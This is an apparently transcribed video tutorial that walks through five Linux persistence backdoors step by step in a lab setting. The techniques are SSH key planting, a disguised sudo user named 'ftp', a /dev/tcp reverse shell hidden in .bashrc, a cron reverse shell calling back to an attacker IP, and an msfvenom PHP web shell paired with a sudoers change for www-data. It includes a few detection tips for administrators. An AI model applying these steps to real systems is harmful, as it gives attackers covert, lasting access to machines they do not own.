Hey guys, I hope you're doing fantastic. This is Dan Tran from GetCyber, and today this is going to be a very, very cool video. I'm going to show you how hackers are able to hack into Linux systems and then maintain persistence and access so they can come back over and over again. Now, a little disclaimer in here. This video is for educational purposes only, so do not hack other people. That's right. If you want to hack, then use your own labs. Set up your own lab on your VMs and your computer and then get practicing on it. This video is also good for sysadmins and people that are managing systems, so you can see how hackers are able to maintain persistence without being noticed, and you can do something about it. You can fix those systems. All right, so let's get right into it. Let's go. All right, so I'm gonna show you five ways that hackers maintain persistence on systems. And the first one is using SSH keys. Let's get to it. All right, so I'm here in my terminal, and the first thing I'm gonna do is generate a key. In order to do that, you just type in SSH key gen, and we're gonna be generating an RSA key. So type RSA. We're going to put this in the root folder .ssh, and we're gonna name it evil. No password for it. Boom, it's done. So now let's navigate to root SSH. Let's do an ls, and it's right there. These are the keys. This is the secret key. So let me show you the secret key right now. This is the secret key. So open SSH private key. And the other one, the public key, is this one. There you go. This is the public key, and it allows root at GetCyber to log into the system. Now, what we have to do is just put the public key on the foreign system. Now, this is assuming that you already have root access or some sort of access on the remote system. So you just type in SSH copy ID, I for interactive, evil pub, of course, and vagrant at the remote IP address of the system where you want to put the key in. Enter the password. There you go. Perfect. Now, what we have to do is just access. So we are here on the SSH folder. In order to access a remote system, you type in SSH, I, and then look for the key. So in this case, evil, and then the connection. There you go. See how you don't need a password to be able to get into the system. And now you can do sudo su, and then you are in. There you go. So that is the first way the hackers are able to get into systems. Now, let me show you where the public key is. If I do an ls a, you'll see that I have SSH here. So let's navigate to that folder. And now let's cat authorized keys. And there it is. So now I can access the system without any password or anything. Something that I want to mention about SSH keys that is very important is that sometimes you don't have access. Even if you put minus I the SSH key and you try to log in, you're still going to encounter the password. In order to bypass that, since you're already sudo, you have to just modify the SSH configuration. So let me show you how to do that also. So I'm here on the remote system, and I'm going to type in nano etc SSH, and then I'm going to get into the SSHD configuration right here. So you have to make sure that these two values in here, so the RSA authentication is set to yes at all times. The same is true for the pub key authentication. Having those two values as yes in there are going to enable you to actually access without any password. Otherwise, you're going to have to use your password. But if the user changes their password, then you won't be able to get in. So that's the first way that hackers are able to get access to a system without password or anything, just the back door to be able to get in and maintain a connection to the remote system. Now let's go to the next one, adding a sneaky user. All right, so for this exercise, we're going to log in to our remote system as we have it already in here like that. And we're gonna do sudo su, go into the home folder like this, ls. So you can see that there's a whole bunch of users in here. So let's just add another user. So user add m for creating a home folder, and then s bin bash FTP. We're going to call it FTP because we want to be sneaky. So we want to make sure that sysadmins don't notice that this is a fake FTP that is signing into the system. So like that, then we're going to do user mod, and we're going to give sudo access to FTP so they can become root. And then we're going to change the password. So pass WD FTP 12345 12345. There you go. Now, if we log out, Control D to exit, Control D again. Now we are on our local system. What I'm going to do is just log in. So SSH, FTP at the remote system, and then 1, 2, 3, 4, 5. There you go. Sudo su, 1, 2, 3, 4, 5, and we are root. So that's another way the hackers are able to maintain persistence, is by creating a pseudo user inside of the system. And they usually mimic other users. So for example, FTP or SSH. So watch out for those. Always look at your users and make sure that you don't have any new users set up on your systems. Now let's go to the next one, using the Bashrc profile. All right, another way that hackers maintain persistence on systems is just by modifying the RC profile on your terminal. So let me show you your profile. So let's get on the remote host right now. So SSH, and we're gonna use FTP, doesn't matter. 1, 2, 3, 4, 5, like that. And we are on the remote system. I'm going to do a sudo su, and then I'm going to go back one. So cd dot dot, and we have our background user in here, and we're going to modify his Bashrc profile. So in order to do that, we just type in nano background.bashrc, like that. And we're going to put a sneaky command somewhere in between here. So we're going to do it right here, and we're going to call dev tcp our hacker IP address, so our local IP address 192.168.177.45 for me, and then a port number. In this case, I'm going to use port number 9000, and then omitting all errors, and let's get out of here. So we go back to our system. So now we're on the local system, and we're going to do an nc minus nlvp 9000. And now we just wait. So anytime the user logs into his account, we're going to be able to get a connection. And let me show you how it's done. So I'm going to open a new terminal window in here. So sudo su, and then I'm going to connect SSH, Vagrant, and then we have a connection, as you can see. Who am I? Vagrant, PWD. And then we have a connection using the Bashrc profile. So every time he enters that remote machine, we're going to be connecting to the backend. So watch out for Bashrc profiles as well. They might have sneaky code in them. Make sure that you check them out. Now in the next section, I'm going to use a cron to get a backdoor to remote in every single minute of the day. Let's go to the next lesson. All right, so let's get a cron tab going on the remote machine, and let's insert a command in there. So an executable command, so we can get a backdoor. So I'm going to SSH into the remote machine like this. And in here, I'm going to do sudo su, and then cron tab minus E. And we're going to use 2, which is nano. And somewhere in here, it doesn't matter where really, we're going to insert this little piece of code. So what we're doing, and I think there's a mistake in here, so let me just get rid of this echo, put it in here in between the lines so you can see it better. But this command is doing a 1 minute cron job that is going to call a bash using an interactive connection from dev tcp 192.168.177.45, which is my Kali machine, and then port number 9000. So it is the same thing that we're doing for Bashrc, but we're actually doing a cron job for it. So let's get out of here and let's get out of this account. So now we're on the local system, and I'm going to do the same thing. So using my netcat, listen for port 9000 and just wait. We wait for 1 minute and we have a connection. There you go. We are connected. All right. So who am I? I'm root in PWD. So we are connected to the remote system just by using cron job. This type of persistence is used all the time. So make sure you go into your cron tab and check your crons to make sure that there's not a command in there or some sort of executable command on your cron jobs, or else you're going to be allowing hackers to get into your system and stay there for a long, long time. In the next lesson, I'm going to show you how to use Metasploit to get persistent on a system. Let's go to the next lesson. All right, you made it. The last persistence, number 5, using Metasploit and a web shell. Let's get right to it. All right, so for this technique, we're gonna do 2 things using Metasploit. The first one is called MSF Venom. So we're going to create a web shell using MSF Venom, and then we're going to use Meterpreter with Metasploit to be able to get the connection into the system. So I'm here on my local machine and I'm going to do MSF Venom. So what I'm doing is basically creating a web shell, right? So I'm going to call localhost my Kali machine and port 9001, and it's going to be a base 64 using PHP, and it's just going to be raw, so it's not going to be obfuscated. I'm going to download or put that shell right on my system here. So let's just do this real quick. We wait for a little bit while MSF Venom is creating the web shell. And there it is. So let's look for it. So ls, and it's right there. So if we do a nano shell and we get into it, this is it. This is the shell. But we have to create the PHP code. So for that, we do typical PHP command in here. And then at the very end, I'm going to do the ending brackets for PHP. And I'm going to save that. All right, so I'm going to cat this shell, right, like this. And then I'm going to copy all this code, copy, so Control Shift C, clean the screen, and then I'm going to SSH into the machine again. There you go. So now we are on the remote machine, sudo su. And in here, I'm going to go into var www.html. I'm going to do an ls, and I'm here on the root folder for the web server, right? So I'm going to create a backup.php file to make sure that it's sneaky, right? So we want to make everything sneaky. And then we're going to paste the code in here and then get out of here, save it. And there's a couple of things that I want to also do. So the first one is I'm going to nano, since I'm root, I'm going to nano etc sudoers like that. And I'm going to go down here, and right here where it says root, I'm going to copy this little bit of code, paste it right in here like that. And I'm going to put www data on this to make sure that data, so the Apache account for the web server, also has sudo privileges. So I'm going to get out of here like that. And the last thing I'm going to do is change the password for www data. So pass WD, WWW, data, 12345, 12345. There you go. So now WWW data, which is the Apache user, has two things. The first one is it's got sudo privileges. And the second one is that I created a password. So when I get in, I'm able to use the password to elevate privileges to my root user. All right, so let's get out of here and let's start up MSF console. Good old Metasploit. All right, look at that cute little cow. So now we're going to use a multi-handler. So multi-handler like that. And we're going to set up a payload on PHP using Meterpreter, and it's going to be a reverse TCP. There you go. Now set lhost 192.168.177.45. which is my Kali system, and then set 9001, and we can run this. Okay, so we started the listener. Now we're gonna get the connection. So I'm going to create a new tab in here, and all I have to do is just curl. So curl 192.168.177.48-backup.php. Perfect, and we have a shell. So that's how easy it is. Let's get out of here. And then shell, who am I, www data. If I do sudo su, I'm not able to do sudo su because it doesn't have a shell. So www data doesn't have a shell, but it does have sudo privileges. So what we're going to do in here is we're going to use Python to give the www data user a shell. All right, so let's do that by spawning a shell using bin bash on the temp folder, and it's going to be qrtpy. And now let's call Python temp directory qrt. Perfect. Now sudo su password 12345, and we are root. Who am I? PWD. And there you go. And that's super easy to create a backdoor using your Apache user, just escalating privileges with the sudo group and then changing the password for your Apache user. All right, so these are five ways in which hackers are able to maintain persistence in different Linux systems. And these are just really basic. I'm sure there is like 100 more ways to maintain persistence. Some of them are very complex and very hard to notice, including rootkits. I hope this was very informative. Make sure you subscribe to my channel, and I'll see you next time. Cheers, stay safe.